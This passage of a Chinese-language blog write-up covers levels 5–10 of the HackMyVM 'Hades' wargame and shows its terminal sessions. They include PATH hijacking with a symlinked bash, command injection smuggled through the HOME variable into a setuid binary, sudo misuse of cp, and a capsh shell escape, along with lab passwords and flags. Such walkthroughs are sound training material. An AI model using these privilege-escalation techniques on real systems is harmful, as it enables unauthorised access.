\/___\/|\n                \/    \\_____\/    \\   |    |  |    \\      |   |  |    ||       \\       ____\\    \\ |   ||\n                \/    \/\\_____\/\\    \\  |     \\\/      \\     |    \\\/     ||     __\/ __   \/    \/\\    \\|___|\/\n                \/    \/\/\\_____\/\\    \\ |\\      \/\\     \\   \/           \/||\\    \\  \/  \\ |    |\/ \\    \\\n                \/____\/ |       | \\____\\| \\_____\\ \\_____\\ \/___________\/ || \\____\\\/    ||\\____\\ \/____\/|     \n                |    | |       | |    || |     | |     ||           | \/ | |    |____\/|| |   ||    | |\n                |____|\/         \\|____| \\|_____|\\|_____||___________|\/   \\|____|   | | \\|___||____|\/\n                                                                        |___|\/\n\n                                       **                                    **.\n                                          ,*                                **\n                                             *,                          ,*\n                                                *                      **\n                                                *,                .*\n                                                   *.           **\n                                                      **      ,*,\n                                                         ** *,\n                                        [== HMVLabs Chapter 2: Hades ==]\n\n                                         +===========================+\n                                         |        Respect &          |\n                                         |        Have fun!          |\n                                         |                           |\n                                         | https:\/\/hackmyvm.eu\/hades |\n                                         +===========================+\n\nLast login: Sat Jun 29 17:06:41 2024 from 193.233.133.212\nandromeda@hades:~$ pwd\n\/pwned\/andromeda\nandromeda@hades:~$ ls -la\ntotal 52\ndrwxr-x--- 2 root      andromeda  4096 Apr  5 06:36 .\ndrwxr-xr-x 1 root      root       4096 Apr  5 06:36 ..\n-rw-r--r-- 1 andromeda andromeda   220 Apr 23  2023 .bash_logout\n-rw-r--r-- 1 andromeda andromeda  3526 Apr 23  2023 .bashrc\n-rw-r--r-- 1 andromeda andromeda   807 Apr 23  2023 .profile\n-r--r----- 1 anthea    anthea       21 Apr  5 06:36 anthea_pass.txt\n-rw-r----- 1 root      andromeda    22 Apr  5 06:36 flagz.txt\n-rw-r----- 1 root      andromeda   166 Apr  5 06:36 mission.txt\n-rwS--s--- 1 root      andromeda 16056 Apr  5 06:36 uid\nandromeda@hades:~$ grep -ra '\\^*\\^' .\ngrep: .\/anthea_pass.txt: Permission denied\n.\/flagz.txt:^xzsHGrOeNctIZLGKzWq^\ngrep: .\/uid: Permission denied\nandromeda@hades:~$ cat mission.txt \n################\n# MISSION 0x05 #\n################\n\n## EN ##\nThe user anthea reminds us who we are.\n\n## ES ##\nLa usuaria anthea procura que no olvidemos quien somos.\nandromeda@hades:~$ .\/uid\nuid=2047(anthea) gid=2046(andromeda) groups=2046(andromeda)\nandromeda@hades:~$ .\/uid\nuid=2047(anthea) gid=2046(andromeda) groups=2046(andromeda)\nandromeda@hades:~$ cat anthea_pass.txt\ncat: anthea_pass.txt: Permission denied\nandromeda@hades:~$ id\nuid=2046(andromeda) gid=2046(andromeda) groups=2046(andromeda)<\/code><\/pre>\n
\u731c\u6d4b\u5148\u4fee\u6539\u4e86uid\uff0c\u7136\u540e\u8fd0\u884c\u4e86id\uff0c\u6700\u540e\u518d\u6539\u56de\u6765\u4e86\uff0c\u5c1d\u8bd5\u52ab\u6301\u73af\u5883\u53d8\u91cf\uff1a<\/p>\n
andromeda@hades:~$ echo $PATH\n\/usr\/local\/bin:\/usr\/bin:\/bin:\/usr\/local\/games:\/usr\/games\nandromeda@hades:~$ ln -s \/bin\/bash \/tmp\/id\nln: failed to create symbolic link '\/tmp\/id': File exists\nandromeda@hades:~$ rm \/tmp\/id\nandromeda@hades:~$ ln -s \/bin\/bash \/tmp\/id\nandromeda@hades:~$ PATH=\/tmp:$PATH\nandromeda@hades:~$ echo $PATH\n\/tmp:\/usr\/local\/bin:\/usr\/bin:\/bin:\/usr\/local\/games:\/usr\/games\nandromeda@hades:~$ id\nandromeda@hades:~$ .\/uid\nanthea@hades:~$ rm \/tmp\/id\nanthea@hades:~$ PATH=\/usr\/local\/bin:\/usr\/bin:\/bin:\/usr\/local\/games:\/usr\/games;echo $PATH\n\/usr\/local\/bin:\/usr\/bin:\/bin:\/usr\/local\/games:\/usr\/games\nanthea@hades:~$ cat anthea_pass.txt \nyWFLtSNQArEBTHtWgkKd<\/code><\/pre>\n
6 anthea<\/h2>\n
anthea@hades:~$ ls -la\ntotal 52\ndrwxr-x--- 2 root      anthea     4096 Apr  5 06:36 .\ndrwxr-xr-x 1 root      root       4096 Apr  5 06:36 ..\n-rw-r--r-- 1 anthea    anthea      220 Apr 23  2023 .bash_logout\n-rw-r--r-- 1 anthea    anthea     3526 Apr 23  2023 .bashrc\n-rw-r--r-- 1 anthea    anthea      807 Apr 23  2023 .profile\n-r--r----- 1 aphrodite aphrodite    21 Apr  5 06:36 aphrodite_pass.txt\n-rw-r----- 1 root      anthea       22 Apr  5 06:36 flagz.txt\n-rw-r----- 1 root      anthea      175 Apr  5 06:36 mission.txt\n-rwS--s--- 1 root      anthea    16256 Apr  5 06:36 obsessed\nanthea@hades:~$ grep -ra '\\^*\\^' .\ngrep: .\/obsessed: Permission denied\ngrep: .\/aphrodite_pass.txt: Permission denied\n.\/flagz.txt:^AcFLuAjhydNKIkPoFLL^\nanthea@hades:~$ cat mission.txt \n################\n# MISSION 0x06 #\n################\n\n## EN ##\nUser aphrodite is obsessed with the number 94.\n\n## ES ##\nLa usuaria aphrodite esta obsesionada con el numero 94.\nanthea@hades:~$ .\/obsessed \nNo MYID ENV\nanthea@hades:~$ env\nSHELL=\/bin\/bash\nPWD=\/pwned\/anthea\nLOGNAME=anthea\nMOTD_SHOWN=pam\nHOME=\/pwned\/anthea\nLS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=00:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.\ntgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.dz=01;31:*.gz=0\n1;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.zst=01;31:*.tzst=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31\n:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.wim=01;31:*.swm=01;31:*.dwm=01;31:*.esd=01;31:*.avif=01;35:*\n.jpg=01;35:*.jpeg=01;35:*.mjpg=01;35:*.mjpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;3\n5:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.webp=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=0\n1;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:\n*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.m4a=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*\n.ra=00;36:*.wav=00;36:*.oga=00;36:*.opus=00;36:*.spx=00;36:*.xspf=00;36:*~=00;90:*#=00;90:*.bak=00;90:*.old=00;90:*.orig=00;90:*.part=00;90:*.rej=00;90:*.swp=00;90:*.tmp=00;90:*.dpkg-dist=00;90:*.dpkg-old=00;90:*.ucf-dist=00;90:*.ucf-new=00;90:*.ucf-old=00;90:*.rpmnew=00;90:*.rpmorig=00;90:*.rpmsave=00;90:\nSSH_CONNECTION=127.0.0.1 45418 127.0.0.1 22\nTERM=xterm-256color\nUSER=anthea\nSHLVL=1\nSSH_CLIENT=127.0.0.1 45418 22\nPATH=\/usr\/local\/bin:\/usr\/bin:\/bin:\/usr\/local\/games:\/usr\/games\nSSH_TTY=\/dev\/pts\/4\n_=\/usr\/bin\/env\nanthea@hades:~$ export MYID=94 \nanthea@hades:~$ .\/obsessed \nCurrent MYID: 57\nIncorrect MYID\nanthea@hades:~$ export MYID=57\nanthea@hades:~$ .\/obsessed\nCurrent MYID: 53\nIncorrect MYID\nanthea@hades:~$ export MYID=$(.\/obsessed)\nanthea@hades:~$ .\/obsessed\nCurrent MYID: 67\nIncorrect MYID\nanthea@hades:~$ whoami;id\nanthea\nuid=2047(anthea) gid=2047(anthea) groups=2047(anthea)\nanthea@hades:~$ export MYID=94\nanthea@hades:~$ .\/obsessed \nCurrent MYID: 57\nIncorrect MYID\nanthea@hades:~$ export MYID=57\nanthea@hades:~$ .\/obsessed\nCurrent MYID: 53\nIncorrect MYID\nanthea@hades:~$ export MYID=53\nanthea@hades:~$ .\/obsessed\nCurrent MYID: 53\nIncorrect MYID<\/code><\/pre>\n
\u540e\u9762\u770b\u7fa4\u4e3b\u89c6\u9891<\/a>\u53d1\u73b0\u8fd9\u548cascii\u7801\u6709\u5173\uff0c\u5636\u3002\u3002\u3002\u3002<\/p>\n
hgbe02@pwn:~\/temp$ ascii\nUsage: ascii [-adxohv] [-t] [char-alias...]\n   -t = one-line output  -a = vertical format\n   -d = Decimal table  -o = octal table  -x = hex table  -b binary table\n   -h = This help screen -v = version information\nPrints all aliases of an ASCII character. Args may be chars, C \\-escapes,\nEnglish names, ^-escapes, ASCII mnemonics, or numerics in decimal\/octal\/hex.\n\nDec Hex    Dec Hex    Dec Hex  Dec Hex  Dec Hex  Dec Hex   Dec Hex   Dec Hex  \n  0 00 NUL  16 10 DLE  32 20    48 30 0  64 40 @  80 50 P   96 60 `  112 70 p\n  1 01 SOH  17 11 DC1  33 21 !  49 31 1  65 41 A  81 51 Q   97 61 a  113 71 q\n  2 02 STX  18 12 DC2  34 22 "  50 32 2  66 42 B  82 52 R   98 62 b  114 72 r\n  3 03 ETX  19 13 DC3  35 23 #  51 33 3  67 43 C  83 53 S   99 63 c  115 73 s\n  4 04 EOT  20 14 DC4  36 24 $  52 34 4  68 44 D  84 54 T  100 64 d  116 74 t\n  5 05 ENQ  21 15 NAK  37 25 %  53 35 5  69 45 E  85 55 U  101 65 e  117 75 u\n  6 06 ACK  22 16 SYN  38 26 &  54 36 6  70 46 F  86 56 V  102 66 f  118 76 v\n  7 07 BEL  23 17 ETB  39 27 '  55 37 7  71 47 G  87 57 W  103 67 g  119 77 w\n  8 08 BS   24 18 CAN  40 28 (  56 38 8  72 48 H  88 58 X  104 68 h  120 78 x\n  9 09 HT   25 19 EM   41 29 )  57 39 9  73 49 I  89 59 Y  105 69 i  121 79 y\n 10 0A LF   26 1A SUB  42 2A *  58 3A :  74 4A J  90 5A Z  106 6A j  122 7A z\n 11 0B VT   27 1B ESC  43 2B +  59 3B ;  75 4B K  91 5B [  107 6B k  123 7B {\n 12 0C FF   28 1C FS   44 2C ,  60 3C <  76 4C L  92 5C \\  108 6C l  124 7C |\n 13 0D CR   29 1D GS   45 2D -  61 3D =  77 4D M  93 5D ]  109 6D m  125 7D }\n 14 0E SO   30 1E RS   46 2E .  62 3E >  78 4E N  94 5E ^  110 6E n  126 7E ~\n 15 0F SI   31 1F US   47 2F \/  63 3F ?  79 4F O  95 5F _  111 6F o  127 7F DEL<\/code><\/pre>\n
\u6240\u4ee5\u53d1\u73b0\u4e86\u5417\uff1f<\/p>\n
\n
53  ==>  5  ==>  57
\n57  ==>  9  ==>  94
\n\u5b83\u53ea\u8bfb\u4e86\u7b2c\u4e00\u4f4d\uff0c\u8fd9\u6837\u6211\u4eec\u5c31\u53ef\u4ee5\u8fdb\u884c\u9a8c\u8bc1\u4e00\u4e0b\uff1a<\/p>\n<\/blockquote>\n
anthea@hades:~$ export MYID=1;.\/obsessed \nCurrent MYID: 49\nIncorrect MYID\nanthea@hades:~$ export MYID=2;.\/obsessed\nCurrent MYID: 50\nIncorrect MYID\nanthea@hades:~$ export MYID=11;.\/obsessed\nCurrent MYID: 49\nIncorrect MYID\nanthea@hades:~$ export MYID=22;.\/obsessed\nCurrent MYID: 50\nIncorrect MYID<\/code><\/pre>\n
\u6240\u4ee5\u6211\u4eec\u627e\u5230\u5bf9\u5e9494\u7684ascii\u5373\u53ef\uff1b<\/p>\n
anthea@hades:~$ export MYID=^;.\/obsessed \nCurrent MYID: 94\naphrodite@hades:~$ cat aphrodite_pass.txt \nHPJVaqRzieKQeyyATsFv<\/code><\/pre>\n
7 aphrodite<\/h2>\n
aphrodite@hades:~$ ls -la\ntotal 52\ndrwxr-x--- 2 root      aphrodite  4096 Apr  5 06:36 .\ndrwxr-xr-x 1 root      root       4096 Apr  5 06:36 ..\n-rw-r--r-- 1 aphrodite aphrodite   220 Apr 23  2023 .bash_logout\n-rw-r--r-- 1 aphrodite aphrodite  3526 Apr 23  2023 .bashrc\n-rw-r--r-- 1 aphrodite aphrodite   807 Apr 23  2023 .profile\n-r--r----- 1 ariadne   ariadne      21 Apr  5 06:36 ariadne_pass.txt\n-rw-r----- 1 root      aphrodite    22 Apr  5 06:36 flagz.txt\n-rwS--s--- 1 root      aphrodite 16216 Apr  5 06:36 homecontent\n-rw-r----- 1 root      aphrodite   185 Apr  5 06:36 mission.txt\naphrodite@hades:~$ grep -ra '\\^*\\^' .\ngrep: .\/ariadne_pass.txt: Permission denied\n.\/flagz.txt:^fmPlsDByrwmEpRAKgeP^\ngrep: .\/homecontent: Permission denied\naphrodite@hades:~$ cat mission.txt \n################\n# MISSION 0x07 #\n################\n\n## EN ##\nThe user ariadne knows what we keep in our HOME.\n\n## ES ##\nLa usuaria ariadne sabe que es lo que guardamos en nuestro HOME.\naphrodite@hades:~$ .\/homecontent \nThe content of your HOME is:\nariadne_pass.txt  flagz.txt  homecontent  mission.txt\naphrodite@hades:~$ echo $HOME\n\/pwned\/aphrodite\naphrodite@hades:~$ HOME='\/;whoami';.\/homecontent \nThe content of your HOME is:\nbin  boot  dev  etc  home  lib  lib64  media  mnt  opt  pazz  proc  pwned  root  run  sbin  srv  sys  tmp  usr  var  www\nariadne\naphrodite@hades:\/pwned\/aphrodite$ HOME='\/pwned\/aphrodite;\/bin\/bash';.\/homecontent \nThe content of your HOME is:\nariadne_pass.txt  flagz.txt  homecontent  mission.txt\nariadne@hades:\/pwned\/aphrodite$ whoami;id;cat ariadne_pass.txt \nariadne\nuid=2049(ariadne) gid=2048(aphrodite) groups=2048(aphrodite)\niNgNazuJrmhJKWixktzk<\/code><\/pre>\n
8 ariadne<\/h2>\n
ariadne@hades:~$ ls -la\ntotal 32\ndrwxr-x--- 2 root    ariadne 4096 Apr  5 06:36 .\ndrwxr-xr-x 1 root    root    4096 Apr  5 06:36 ..\n-rw-r--r-- 1 ariadne ariadne  220 Apr 23  2023 .bash_logout\n-rw-r--r-- 1 ariadne ariadne 3526 Apr 23  2023 .bashrc\n-rw-r--r-- 1 ariadne ariadne  807 Apr 23  2023 .profile\n-rw-r----- 1 root    ariadne   22 Apr  5 06:36 flagz.txt\n-rw-r----- 1 root    ariadne  165 Apr  5 06:36 mission.txt\nariadne@hades:~$ grep -ra '\\^*\\^' .\n.\/flagz.txt:^FuGFaFNhtKNxUInxAtd^\nariadne@hades:~$ cat mission.txt \n################\n# MISSION 0x08 #\n################\n\n## EN ##\nThe user arete lets us use cp on her behalf.\n\n## ES ##\nLa usuaria arete nos deja usar cp en su nombre.\n\nariadne@hades:~$ whereis cp\ncp: \/usr\/bin\/cp \/usr\/share\/man\/man1\/cp.1.gz\nariadne@hades:~$ ls -la \/usr\/bin\/cp\n-rwxr-xr-x 1 root root 151152 Sep 20  2022 \/usr\/bin\/cp\nariadne@hades:~$ sudo -l\nMatching Defaults entries for ariadne on hades:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin, use_pty\n\nUser ariadne may run the following commands on hades:\n    (arete) NOPASSWD: \/bin\/cp\nariadne@hades:~$ sudo -u arete \/bin\/cp \/pwned\/arete\/arete_pass.txt \/dev\/stdout 2>\/dev\/null\n\/bin\/cp: cannot stat '\/pwned\/arete\/arete_pass.txt': No such file or directory\nariadne@hades:~$ sudo -u arete \/bin\/cp \/pwned\/arete\/flagz.txt \/dev\/stdout 2>\/dev\/null\n^qmrrbGUXLTqLFDyCDlx^<\/code><\/pre>\n
\u7136\u540e\u63d0\u4ea4flag\u83b7\u53d6\u5bc6\u7801\uff1a08: arete\/QjrIovHacmGWxVjXRLmA<\/strong><\/p>\n
9 arete<\/h2>\n
arete@hades:~$ ls -la\ntotal 32\ndrwxr-x--- 2 root  arete 4096 Apr  5 06:36 .\ndrwxr-xr-x 1 root  root  4096 Apr  5 06:36 ..\n-rw-r--r-- 1 arete arete  220 Apr 23  2023 .bash_logout\n-rw-r--r-- 1 arete arete 3526 Apr 23  2023 .bashrc\n-rw-r--r-- 1 arete arete  807 Apr 23  2023 .profile\n-rw-r----- 1 root  arete   22 Apr  5 06:36 flagz.txt\n-rw-r----- 1 root  arete  227 Apr  5 06:36 mission.txt\narete@hades:~$ grep -ra '\\^*\\^' .\n.\/flagz.txt:^qmrrbGUXLTqLFDyCDlx^\narete@hades:~$ cat mission.txt \n################\n# MISSION 0x09 #\n################\n\n## EN ##\nThe user artemis allows us to use some binary on her behalf. Its a gift... \n\n## ES ##\nLa usuaria artemis nos permite usar algun binario en su nombre. Es un regalo...\narete@hades:~$ sudo -l\nMatching Defaults entries for arete on hades:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin, use_pty\n\nUser arete may run the following commands on hades:\n    (artemis) NOPASSWD: \/sbin\/capsh<\/code><\/pre>\n
\n
\u53c2\u8003 https:\/\/gtfobins.github.io\/gtfobins\/capsh\/#shell<\/a><\/p>\n
It can be used to break out from restricted environments by spawning an interactive system shell.<\/p>\n
capsh --<\/p>\n<\/blockquote>\n
arete@hades:~$ sudo -u artemis \/sbin\/capsh --\nartemis@hades:\/pwned\/arete$ whoami;id\nartemis\nuid=2051(artemis) gid=2051(artemis) groups=2051(artemis)\nartemis@hades:\/pwned\/arete$ cd ~\nartemis@hades:~$ ls -la \ntotal 48\ndrwxr-x--- 2 root    artemis  4096 Apr  5 06:36 .\ndrwxr-xr-x 1 root    root     4096 Apr  5 06:36 ..\n-rw-r--r-- 1 artemis artemis   220 Apr 23  2023 .bash_logout\n-rw-r--r-- 1 artemis artemis  3526 Apr 23  2023 .bashrc\n-rw-r--r-- 1 artemis artemis   807 Apr 23  2023 .profile\n-rw-r----- 1 root    artemis    22 Apr  5 06:36 flagz.txt\n-rw-r----- 1 root    artemis   202 Apr  5 06:36 mission.txt\n-rw---x--- 1 root    artemis 16056 Apr  5 06:36 restricted<\/code><\/pre>\n
10 artemis<\/h2>\n
artemis@hades:~$ ls -la\ntotal 48\ndrwxr-x--- 2 root    artemis  4096 Apr  5 06:36 .\ndrwxr-xr-x 1 root    root     4096 Apr  5 06:36 ..\n-rw-r--r-- 1 artemis artemis   220 Apr 23  2023 .bash_logout\n-rw-r--r-- 1 artemis artemis  3526 Apr 23  2023 .bashrc\n-rw-r--r-- 1 artemis artemis   807 Apr 23  2023 .profile\n-rw-r----- 1 root    artemis    22 Apr  5 06:36 flagz.txt\n-rw-r----- 1 root    artemis   202 Apr  5 06:36 mission.txt\n-rw---x--- 1 root    artemis 16056 Apr  5 06:36 restricted\nartemis@hades:~$ grep -ra '\\^*\\^' .\ngrep: .\/restricted: Permission denied\n.\/flagz.txt:^SegGdzPgnNdGAmKjnsa^\nartemis@hades:~$ cat mission.txt \n################\n# MISSION 0x10 #\n################\n\n## EN ##\nWe need \/bin\/bash so that the user asia gives us her password.\n\n## ES ##\nNecesitamos \/bin\/bash para que la usuaria asia nos de su password.\nartemis@hades:~$ .\/restricted \nYour SHELL is: \/bin\/rbash\n\ndjqWtkLisbQlrGtLYHCv<\/code><\/pre>\n
\u5636\uff0c\u5565\u60c5\u51b5\uff0c\u96be\u9053\u662f\u6ca1\u6709ssh\u8fde\u63a5\u7684\u539f\u56e0\uff1f\u8bd5\u8bd5\uff1a
\n09: artemis\/HIiaojeORLaJBVSPDDCZ<\/p>\n
artemis@hades:~$ ls -la\ntotal 48\ndrwxr-x--- 2 root    artemis  4096 Apr  5 06:36 .\ndrwxr-xr-x 1 root    root     4096 Apr  5 06:36 ..\n-rw-r--r-- 1 artemis artemis   220 Apr 23  2023 .bash_logout\n-rw-r--r-- 1 artemis artemis  3526 Apr 23  2023 .bashrc\n-rw-r--r-- 1 artemis artemis   807 Apr 23  2023 .profile\n-rw-r----- 1 root    artemis    22 Apr  5 06:36 flagz.txt\n-rw-r----- 1 root    artemis   202 Apr  5 06:36 mission.txt\n-rw---x--- 1 root    artemis 16056 Apr  5 06:36 restricted\nartemis@hades:~$ .\/restricted \n-rbash: .\/restricted: restricted: cannot specify `\/' in command names\nartemis@hades:~$ bash\nartemis@hades:~$ .\/restricted \nYour SHELL is: \/bin\/rbash\n\ndjqWtkLisbQlrGtLYHCv<\/code><\/pre>\n
\u554a\u8fd9\u3002\u3002\u3002\u3002\u3002<\/p>\n","protected":false},"excerpt":{"rendered":"
1 hacker Host: hades.hackmyvm.eu Port: 6666 User: hacke […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,18],"tags":[],"class_list":["post-720","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/720","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=720"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/720\/revisions"}],"predecessor-version":[{"id":721,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/720\/revisions\/721"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=720"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=720"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=720"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}